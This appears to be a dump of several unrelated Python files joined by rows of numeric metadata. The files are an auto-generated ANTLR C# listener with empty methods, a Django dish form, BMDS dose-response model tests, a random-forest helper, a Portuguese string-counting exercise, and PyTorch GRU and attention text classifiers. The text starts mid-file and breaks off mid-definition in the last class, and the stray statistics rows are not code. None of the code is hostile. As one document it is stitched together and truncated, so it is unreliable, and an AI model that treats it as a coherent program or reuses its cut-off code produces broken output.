def enterRemove_contextual_keyword(self, ctx: CSharp4Parser.Remove_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#remove_contextual_keyword.
def exitRemove_contextual_keyword(self, ctx: CSharp4Parser.Remove_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#dynamic_contextual_keyword.
def enterDynamic_contextual_keyword(self, ctx: CSharp4Parser.Dynamic_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#dynamic_contextual_keyword.
def exitDynamic_contextual_keyword(self, ctx: CSharp4Parser.Dynamic_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#arglist.
def enterArglist(self, ctx: CSharp4Parser.ArglistContext):
pass
# Exit a parse tree produced by CSharp4Parser#arglist.
def exitArglist(self, ctx: CSharp4Parser.ArglistContext):
pass
# Enter a parse tree produced by CSharp4Parser#right_arrow.
def enterRight_arrow(self, ctx: CSharp4Parser.Right_arrowContext):
pass
# Exit a parse tree produced by CSharp4Parser#right_arrow.
def exitRight_arrow(self, ctx: CSharp4Parser.Right_arrowContext):
pass
# Enter a parse tree produced by CSharp4Parser#right_shift.
def enterRight_shift(self, ctx: CSharp4Parser.Right_shiftContext):
pass
# Exit a parse tree produced by CSharp4Parser#right_shift.
def exitRight_shift(self, ctx: CSharp4Parser.Right_shiftContext):
pass
# Enter a parse tree produced by CSharp4Parser#right_shift_assignment.
def enterRight_shift_assignment(self, ctx: CSharp4Parser.Right_shift_assignmentContext):
pass
# Exit a parse tree produced by CSharp4Parser#right_shift_assignment.
def exitRight_shift_assignment(self, ctx: CSharp4Parser.Right_shift_assignmentContext):
pass
# Enter a parse tree produced by CSharp4Parser#literal.
def enterLiteral(self, ctx: CSharp4Parser.LiteralContext):
pass
# Exit a parse tree produced by CSharp4Parser#literal.
def exitLiteral(self, ctx: CSharp4Parser.LiteralContext):
pass
# Enter a parse tree produced by CSharp4Parser#boolean_literal.
def enterBoolean_literal(self, ctx: CSharp4Parser.Boolean_literalContext):
pass
# Exit a parse tree produced by CSharp4Parser#boolean_literal.
def exitBoolean_literal(self, ctx: CSharp4Parser.Boolean_literalContext):
pass
# Enter a parse tree produced by CSharp4Parser#keyword.
def enterKeyword(self, ctx: CSharp4Parser.KeywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#keyword.
def exitKeyword(self, ctx: CSharp4Parser.KeywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_definition.
def enterClass_definition(self, ctx: CSharp4Parser.Class_definitionContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_definition.
def exitClass_definition(self, ctx: CSharp4Parser.Class_definitionContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_definition.
def enterStruct_definition(self, ctx: CSharp4Parser.Struct_definitionContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_definition.
def exitStruct_definition(self, ctx: CSharp4Parser.Struct_definitionContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_definition.
def enterInterface_definition(self, ctx: CSharp4Parser.Interface_definitionContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_definition.
def exitInterface_definition(self, ctx: CSharp4Parser.Interface_definitionContext):
pass
# Enter a parse tree produced by CSharp4Parser#enum_definition.
def enterEnum_definition(self, ctx: CSharp4Parser.Enum_definitionContext):
pass
# Exit a parse tree produced by CSharp4Parser#enum_definition.
def exitEnum_definition(self, ctx: CSharp4Parser.Enum_definitionContext):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_definition.
def enterDelegate_definition(self, ctx: CSharp4Parser.Delegate_definitionContext):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_definition.
def exitDelegate_definition(self, ctx: CSharp4Parser.Delegate_definitionContext):
pass
# Enter a parse tree produced by CSharp4Parser#event_declaration2.
def enterEvent_declaration2(self, ctx: CSharp4Parser.Event_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#event_declaration2.
def exitEvent_declaration2(self, ctx: CSharp4Parser.Event_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#field_declaration2.
def enterField_declaration2(self, ctx: CSharp4Parser.Field_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#field_declaration2.
def exitField_declaration2(self, ctx: CSharp4Parser.Field_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#property_declaration2.
def enterProperty_declaration2(self, ctx: CSharp4Parser.Property_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#property_declaration2.
def exitProperty_declaration2(self, ctx: CSharp4Parser.Property_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#constant_declaration2.
def enterConstant_declaration2(self, ctx: CSharp4Parser.Constant_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#constant_declaration2.
def exitConstant_declaration2(self, ctx: CSharp4Parser.Constant_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_declaration2.
def enterIndexer_declaration2(self, ctx: CSharp4Parser.Indexer_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_declaration2.
def exitIndexer_declaration2(self, ctx: CSharp4Parser.Indexer_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_definition.
def enterDestructor_definition(self, ctx: CSharp4Parser.Destructor_definitionContext):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_definition.
def exitDestructor_definition(self, ctx: CSharp4Parser.Destructor_definitionContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_declaration2.
def enterConstructor_declaration2(self, ctx: CSharp4Parser.Constructor_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_declaration2.
def exitConstructor_declaration2(self, ctx: CSharp4Parser.Constructor_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#method_declaration2.
def enterMethod_declaration2(self, ctx: CSharp4Parser.Method_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#method_declaration2.
def exitMethod_declaration2(self, ctx: CSharp4Parser.Method_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#method_member_name.
def enterMethod_member_name(self, ctx: CSharp4Parser.Method_member_nameContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_member_name.
def exitMethod_member_name(self, ctx: CSharp4Parser.Method_member_nameContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_member_name2.
def enterMethod_member_name2(self, ctx: CSharp4Parser.Method_member_name2Context):
pass
# Exit a parse tree produced by CSharp4Parser#method_member_name2.
def exitMethod_member_name2(self, ctx: CSharp4Parser.Method_member_name2Context):
pass
# Enter a parse tree produced by CSharp4Parser#operator_declaration2.
def enterOperator_declaration2(self, ctx: CSharp4Parser.Operator_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#operator_declaration2.
def exitOperator_declaration2(self, ctx: CSharp4Parser.Operator_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#interface_method_declaration2.
def enterInterface_method_declaration2(self, ctx: CSharp4Parser.Interface_method_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#interface_method_declaration2.
def exitInterface_method_declaration2(self, ctx: CSharp4Parser.Interface_method_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#interface_property_declaration2.
def enterInterface_property_declaration2(self, ctx: CSharp4Parser.Interface_property_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#interface_property_declaration2.
def exitInterface_property_declaration2(self, ctx: CSharp4Parser.Interface_property_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#interface_event_declaration2.
def enterInterface_event_declaration2(self, ctx: CSharp4Parser.Interface_event_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#interface_event_declaration2.
def exitInterface_event_declaration2(self, ctx: CSharp4Parser.Interface_event_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#interface_indexer_declaration2.
def enterInterface_indexer_declaration2(self, ctx: CSharp4Parser.Interface_indexer_declaration2Context):
pass
# Exit a parse tree produced by CSharp4Parser#interface_indexer_declaration2.
def exitInterface_indexer_declaration2(self, ctx: CSharp4Parser.Interface_indexer_declaration2Context):
pass
# Enter a parse tree produced by CSharp4Parser#member_access2.
def enterMember_access2(self, ctx: CSharp4Parser.Member_access2Context):
pass
# Exit a parse tree produced by CSharp4Parser#member_access2.
def exitMember_access2(self, ctx: CSharp4Parser.Member_access2Context):
pass
# Enter a parse tree produced by CSharp4Parser#method_invocation2.
def enterMethod_invocation2(self, ctx: CSharp4Parser.Method_invocation2Context):
pass
# Exit a parse tree produced by CSharp4Parser#method_invocation2.
def exitMethod_invocation2(self, ctx: CSharp4Parser.Method_invocation2Context):
pass
# Enter a parse tree produced by CSharp4Parser#object_creation_expression2.
def enterObject_creation_expression2(self, ctx: CSharp4Parser.Object_creation_expression2Context):
pass
# Exit a parse tree produced by CSharp4Parser#object_creation_expression2.
def exitObject_creation_expression2(self, ctx: CSharp4Parser.Object_creation_expression2Context):
pass
| 43.375459 | 134 | 0.775536 | 15,794 | 141,751 | 6.735786 | 0.040965 | 0.045965 | 0.076609 | 0.137895 | 0.913728 | 0.902768 | 0.902768 | 0.756281 | 0.749636 | 0.395601 | 0 | 0.014794 | 0.172669 | 141,751 | 3,267 | 135 | 43.388736 | 0.892347 | 0.374565 | 0 | 0.498164 | 1 | 0 | 0.000011 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.498164 | false | 0.498164 | 0.001836 | 0 | 0.500612 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
153c1465b08bbccc49bc83fa2558acf54b7c6f1d | 749 | py | Python | store/forms.py | salemzii/ChopFast | 95ea88387ecfdb56bd643970b69425b1a1c6f388 | [
"MIT"
] | null | null | null | store/forms.py | salemzii/ChopFast | 95ea88387ecfdb56bd643970b69425b1a1c6f388 | [
"MIT"
] | null | null | null | store/forms.py | salemzii/ChopFast | 95ea88387ecfdb56bd643970b69425b1a1c6f388 | [
"MIT"
] | null | null | null | from django import forms
from .models import Dish
class AddDish(forms.ModelForm):
class Meta:
model = Dish
fields = ['name', 'description', 'image', 'price']
widgets = {
'name': forms.TextInput(attrs={'class': 'form-control', 'id': 'name'}),
'description': forms.TextInput(attrs={'class': 'form-control', 'id': 'description'})
}
class EditDish(forms.ModelForm):
class Meta:
model = Dish
fields = ['name', 'description', 'image', 'price', 'available']
widgets = {
'name': forms.TextInput(attrs={'class': 'form-control', 'id': 'name'}),
'description': forms.TextInput(attrs={'class': 'form-control', 'id': 'description'})
} | 31.208333 | 96 | 0.564753 | 73 | 749 | 5.794521 | 0.328767 | 0.141844 | 0.179669 | 0.22695 | 0.822695 | 0.822695 | 0.822695 | 0.822695 | 0.822695 | 0.822695 | 0 | 0 | 0.253672 | 749 | 24 | 97 | 31.208333 | 0.756708 | 0 | 0 | 0.555556 | 0 | 0 | 0.26 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
155a837d160445b3e9543d7843a0391632c5c5f8 | 3,828 | py | Python | tests/bmds2/test_dfile_dichotomous.py | shapiromatron/bmds | 57562858f3c45e9b9ec23e1c229a8a1de0ea4a70 | [
"MIT"
] | 2 | 2017-05-01T20:00:26.000Z | 2019-07-09T16:42:25.000Z | tests/bmds2/test_dfile_dichotomous.py | shapiromatron/bmds | 57562858f3c45e9b9ec23e1c229a8a1de0ea4a70 | [
"MIT"
] | 20 | 2016-11-23T21:30:22.000Z | 2022-02-28T15:42:36.000Z | tests/bmds2/test_dfile_dichotomous.py | shapiromatron/bmds | 57562858f3c45e9b9ec23e1c229a8a1de0ea4a70 | [
"MIT"
] | 2 | 2016-06-28T20:32:00.000Z | 2017-02-23T20:30:24.000Z | from bmds import bmds2
def test_Logistic_215(ddataset):
model = bmds2.models.Logistic_215(ddataset)
dfile = model.as_dfile()
expected = "Logistic\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 0 0 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35" # noqa
assert dfile == expected
def test_LogLogistic_215(ddataset):
model = bmds2.models.LogLogistic_215(ddataset)
dfile = model.as_dfile()
expected = "LogLogistic\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 1 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35" # noqa
assert dfile == expected
def test_Gamma_217(ddataset):
model = bmds2.models.Gamma_217(ddataset)
dfile = model.as_dfile()
expected = "Gamma\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35" # noqa
assert dfile == expected
def test_Probit_34(ddataset):
model = bmds2.models.Probit_34(ddataset)
dfile = model.as_dfile()
expected = "Probit\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 0 0 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35" # noqa
assert dfile == expected
def test_Multistage_34(ddataset):
model = bmds2.models.Multistage_34(ddataset)
dfile = model.as_dfile()
expected = "Multistage\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4 2\n500 1e-08 1e-08 0 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35" # noqa
assert dfile == expected
def test_MultistageCancer_34(ddataset):
model = bmds2.models.MultistageCancer_34(ddataset)
dfile = model.as_dfile()
expected = "Multistage-Cancer\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4 2\n500 1e-08 1e-08 0 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35" # noqa
assert dfile == expected
def test_Weibull_217(ddataset):
model = bmds2.models.Weibull_217(ddataset)
dfile = model.as_dfile()
expected = "Weibull\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35" # noqa
assert dfile == expected
def test_LogProbit_34(ddataset):
model = bmds2.models.LogProbit_34(ddataset)
dfile = model.as_dfile()
expected = "LogProbit\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 1 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999\n0\n-9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35" # noqa
assert dfile == expected
def test_DichotomousHill_13(ddataset):
model = bmds2.models.DichotomousHill_13(ddataset)
dfile = model.as_dfile()
expected = "Dichotomous-Hill\nBMDS_Model_Run\n/temp/bmd/datafile.dax\n/temp/bmd/output.out\n4\n500 1e-08 1e-08 0 1 1 0 0\n0.1 0 0.95\n-9999 -9999 -9999 -9999\n0\n-9999 -9999 -9999 -9999\nDose Incidence NEGATIVE_RESPONSE\n0.000000 5 70\n1.960000 1 48\n5.690000 3 47\n29.750000 14 35" # noqa
assert dfile == expected
| 58.892308 | 294 | 0.730146 | 725 | 3,828 | 3.768276 | 0.092414 | 0.111274 | 0.087848 | 0.085652 | 0.892021 | 0.814422 | 0.802343 | 0.724012 | 0.687042 | 0.687042 | 0 | 0.261796 | 0.14185 | 3,828 | 64 | 295 | 59.8125 | 0.569863 | 0.011494 | 0 | 0.391304 | 0 | 0.195652 | 0.604663 | 0.252252 | 0 | 0 | 0 | 0 | 0.195652 | 1 | 0.195652 | false | 0 | 0.021739 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
156a61482080734c8aaaf6a7ae2d8f7caf3f400f | 141 | py | Python | model/Random_Forest.py | UrosOgrizovic/FIFA-19-player-position-predictor | 402fa4867678e7f2bf2144bd267b596bd196a5bb | [
"MIT"
] | 2 | 2021-11-27T00:15:42.000Z | 2021-12-16T08:49:00.000Z | model/Random_Forest.py | UrosOgrizovic/FIFA-19-player-position-predictor | 402fa4867678e7f2bf2144bd267b596bd196a5bb | [
"MIT"
] | null | null | null | model/Random_Forest.py | UrosOgrizovic/FIFA-19-player-position-predictor | 402fa4867678e7f2bf2144bd267b596bd196a5bb | [
"MIT"
] | null | null | null | from sklearn.ensemble import RandomForestClassifier
def random_forest():
return RandomForestClassifier(n_estimators=100, oob_score=True) | 35.25 | 67 | 0.843972 | 16 | 141 | 7.25 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023438 | 0.092199 | 141 | 4 | 67 | 35.25 | 0.882813 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | true | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 7 |
1595071841ebfc62a708abb189d19d558244c1b8 | 557 | py | Python | python--exercicios/ex026.py | Eliezer2000/python | 12abb54c6536acb2f36b8f34bf51ec765857eb75 | [
"MIT"
] | null | null | null | python--exercicios/ex026.py | Eliezer2000/python | 12abb54c6536acb2f36b8f34bf51ec765857eb75 | [
"MIT"
] | null | null | null | python--exercicios/ex026.py | Eliezer2000/python | 12abb54c6536acb2f36b8f34bf51ec765857eb75 | [
"MIT"
] | null | null | null | frase = str(input('Digite algo : ')).upper().strip()
print('A letra A aparece na frase: {} vezes '.format(frase.count('A')))
print('Ela aparece primeiro na posição : {} '.format(frase.find('A')+1))
print('Ela aparece po último na posição : {}'.format(frase.rfind('A')+1))
frase = str(input('Digite uma frase : ')).upper().strip()
print('A letra A aparece na frase : {} vezes'.format(frase.count('A')))
print('Ela aparece primeiro na posição : {} '.format(frase.find('A')+1))
print('Ela aparece por último na posição : {} '.format(frase.rfind('A')+1))
| 42.846154 | 76 | 0.655296 | 85 | 557 | 4.294118 | 0.294118 | 0.180822 | 0.164384 | 0.219178 | 0.849315 | 0.849315 | 0.849315 | 0.849315 | 0.668493 | 0.668493 | 0 | 0.008214 | 0.125673 | 557 | 12 | 77 | 46.416667 | 0.741273 | 0 | 0 | 0.5 | 0 | 0 | 0.478339 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.75 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
bf0ee11f3b88e8c3b929527181f0cd10fee09366 | 19,863 | py | Python | models.py | LordRaivo/ToxicBot | ebc09064afef0f4af5def1022eada9ef109d27ac | [
"MIT"
] | null | null | null | models.py | LordRaivo/ToxicBot | ebc09064afef0f4af5def1022eada9ef109d27ac | [
"MIT"
] | null | null | null | models.py | LordRaivo/ToxicBot | ebc09064afef0f4af5def1022eada9ef109d27ac | [
"MIT"
] | 1 | 2022-02-03T23:49:29.000Z | 2022-02-03T23:49:29.000Z | import numpy as np # linear algebra
import torch
import torch.nn as nn
import torch.nn.functional as F
# [CNN, GRU, SelfAttention, XformEncoder, XformGru, GruAttention, HydraGruAttention, ResnetHydraGruAttn]
models = [
'CNN',
'GRU',
'SelfAttention',
'XformEncoder',
'XformGru',
'GruAttention',
'HydraGruAttention',
'ResnetHydraGruAttn',
]
class CNN(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, layers:int=2, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(20_000, emb_dims)
self.CNN = nn.Sequential(
nn.Conv1d(emb_dims, hidden, 3),
nn.Dropout(0.3),
nn.ReLU(),
nn.Conv1d(hidden, hidden, 3),
nn.Dropout(0.3),
nn.ReLU(),
nn.AdaptiveMaxPool1d(1),
)
self.linear = nn.Sequential(
nn.Dropout(0.3),
nn.Linear(hidden, hidden),
nn.ReLU(),
nn.Dropout(0.3),
nn.Linear(hidden, classes),
)
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
x = self.embeddings(x)
x = torch.transpose(x, 1, 2)
x = self.CNN(x)
return self.linear(x[...,0])
class GRU(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, layers:int=1, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(20_000, emb_dims)
self.GRU = nn.GRU(
input_size = emb_dims,
hidden_size = hidden,
num_layers = layers,
bidirectional=True,
dropout=0.3,
batch_first=True,
)
self.linear = nn.Sequential(
nn.Dropout(0.3),
nn.Linear(hidden*5, hidden),
nn.ReLU(),
nn.Dropout(0.3),
nn.Linear(hidden, classes),
)
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
x = self.embeddings(x)
x = nn.utils.rnn.pack_padded_sequence(x, lengths.cpu(), batch_first=True)
x, h = self.GRU(x)
x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=True)
avg = x.mean(dim=1)
max = x.max(dim=1)[0]
x = torch.cat((h[-1], avg, max), dim=1)
#x = F.relu(x)
return self.linear(x)
class SelfAttention(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=256, heads=8, layers:int=2, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(20_000, emb_dims)
self.attn = nn.MultiheadAttention(
embed_dim=emb_dims,
num_heads=heads,
)
self.norm = nn.LayerNorm(emb_dims)
self.linear = nn.Sequential(
nn.Dropout(0.3),
nn.Linear(emb_dims, hidden),
nn.ReLU(),
nn.Dropout(0.3),
nn.Linear(hidden, classes),
)
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
x = self.embeddings(x)
x = torch.transpose(x, 0, 1)
attn, _ = self.attn(x, x, x)
x = self.norm(x + attn)
x = x.mean(0)
x = self.linear(x)
return x
class XformEncoder(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=1024, heads=8, layers:int=1, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(20_000, emb_dims)
self.encoder_layer = nn.TransformerEncoderLayer(
d_model=emb_dims,
nhead=heads,
dim_feedforward=hidden
)
self.encoder = nn.TransformerEncoder(
encoder_layer=self.encoder_layer,
num_layers=layers,
)
self.linear = nn.Linear(2*emb_dims, classes)
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
x = self.embeddings(x)
x = torch.transpose(x, 0, 1)
x = self.encoder(x)
x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
x = self.linear(x)
return x
class XformGru(nn.Module):
def __init__(self, emb_dims = 256, hidden:int=256, heads=8, layers:int=1, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(20_000, emb_dims)
self.encoder_layer = nn.TransformerEncoderLayer(
d_model=emb_dims,
nhead=heads,
dim_feedforward=hidden
)
self.encoder = nn.TransformerEncoder(
encoder_layer=self.encoder_layer,
num_layers=layers,
)
self.GRU = nn.GRU(
input_size = emb_dims,
hidden_size = hidden,
num_layers = layers,
bidirectional=True,
dropout=0.3,
batch_first=True,
)
self.linear = nn.Sequential(
nn.Dropout(0.3),
nn.Linear(hidden*5 + 2*emb_dims, hidden),
nn.ReLU(),
nn.Dropout(0.3),
nn.Linear(hidden, classes),
)
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
x = self.embeddings(x)
#Attention
attn = torch.transpose(x, 0, 1)
attn = self.encoder(attn)
attn = torch.cat((attn.mean(0), attn.max(0)[0]), dim=1)
#Gru
gru = nn.utils.rnn.pack_padded_sequence(x, lengths.cpu(), batch_first=True)
gru, gru_h = self.GRU(gru)
gru, _ = nn.utils.rnn.pad_packed_sequence(gru, batch_first=True)
gru = torch.cat((gru_h[-1], gru.mean(dim=1), gru.max(dim=1)[0]), dim=1)
x = torch.cat((attn, gru), dim=1)
x = self.linear(x)
return x
class GruAttention(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, heads=8, layers:int=1, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(vocab_size, emb_dims)
self.GRU = nn.GRU(
input_size = emb_dims,
hidden_size = hidden,
num_layers = layers,
bidirectional=True,
dropout=dropout,
batch_first=True,
)
self.attn = nn.MultiheadAttention(
embed_dim=hidden*2,
num_heads=heads,
)
self.linear = nn.Sequential(
nn.Dropout(dropout),
nn.Linear(hidden*4, hidden),
nn.ReLU(),
nn.Dropout(dropout),
nn.Linear(hidden, classes),
)
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
x = self.embeddings(x)
#Gru
x = nn.utils.rnn.pack_padded_sequence(x, lengths.cpu(), batch_first=True)
x, _ = self.GRU(x)
x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
#Attention
x, _ = self.attn(x,x,x)
x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
x = self.linear(x)
return x
class HydraGruAttention(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=128, heads=8, layers:int=1, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(vocab_size, emb_dims)
self.GRU = nn.GRU(
input_size = emb_dims,
hidden_size = hidden//2,
num_layers = layers,
bidirectional=True,
dropout=dropout,
batch_first=True,
)
self.attn = nn.MultiheadAttention(
embed_dim=hidden,
num_heads=heads,
)
self.linear = nn.ModuleList([nn.Sequential(
nn.Dropout(dropout),
nn.Linear(hidden*2, hidden),
nn.ReLU(),
nn.Dropout(dropout),
nn.Linear(hidden, 1)
) for _ in range(classes)])
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
x = self.embeddings(x)
#Gru
x = nn.utils.rnn.pack_padded_sequence(x, lengths.cpu(), batch_first=True)
x, _ = self.GRU(x)
x, _ = nn.utils.rnn.pad_packed_sequence(x, batch_first=False)
#Attention
x, _ = self.attn(x,x,x)
x = torch.cat((x.mean(0), x.max(0)[0]), dim=1)
x = torch.cat([l(x) for l in self.linear], dim=1)
return x
class AttnBlock(nn.Module):
def __init__(self, emb_dims:int=2048, kdim:int=None, vdim:int=None, heads:int=8):
super().__init__()
self.act1 = nn.ReLU()
self.attn1 = nn.MultiheadAttention(embed_dim=emb_dims, num_heads=heads, kdim=kdim, vdim=vdim)
self.act2 = nn.ReLU()
self.attn2 = nn.MultiheadAttention(embed_dim=emb_dims, num_heads=heads, kdim=kdim, vdim=vdim)
def forward(self, x):
skip = x
x = self.act1(x)
x, _ = self.attn1(x, x, x)
x = self.act2(x)
x, _ = self.attn2(x, x, x)
return x + skip
class ResnetAttention(nn.Module):
def __init__(self, emb_dims = 512, hidden:int=512, heads=8, layers:int=16, vocab_size=20_000, dropout=0.3, classes:int=6, **kwargs):
super().__init__()
self.embeddings = nn.Embedding(vocab_size, emb_dims)
self.attn = nn.Sequential(
*(AttnBlock(emb_dims, heads=heads) for _ in range(layers)),
nn.ReLU(),
)
self.linear = nn.Sequential(
nn.Dropout(dropout),
nn.Linear(emb_dims*2, hidden),
nn.ReLU(),
nn.Dropout(dropout),
nn.Linear(hidden, classes),
)
def forward(self, x, lengths=None):
if lengths is None:
x, lengths = x
x = self.embeddings(x)
x = self.attn(x)
x = torch.cat((x.mean(1), x.max(1)[0]), dim=1)
x = self.linear(x)
return x
class GruAttnBlock(nn.Module):
def __init__(self, emb_dims:int=512, hidden:int=128, kdim:int=None, vdim:int=None, heads:int=8, dropout:float=0.3, **kwargs):
super().__init__()
self.GRU = nn.GRU(
input_size = emb_dims,
hidden_size = hidden//2,
num_layers = 1,
bidirectional=True,
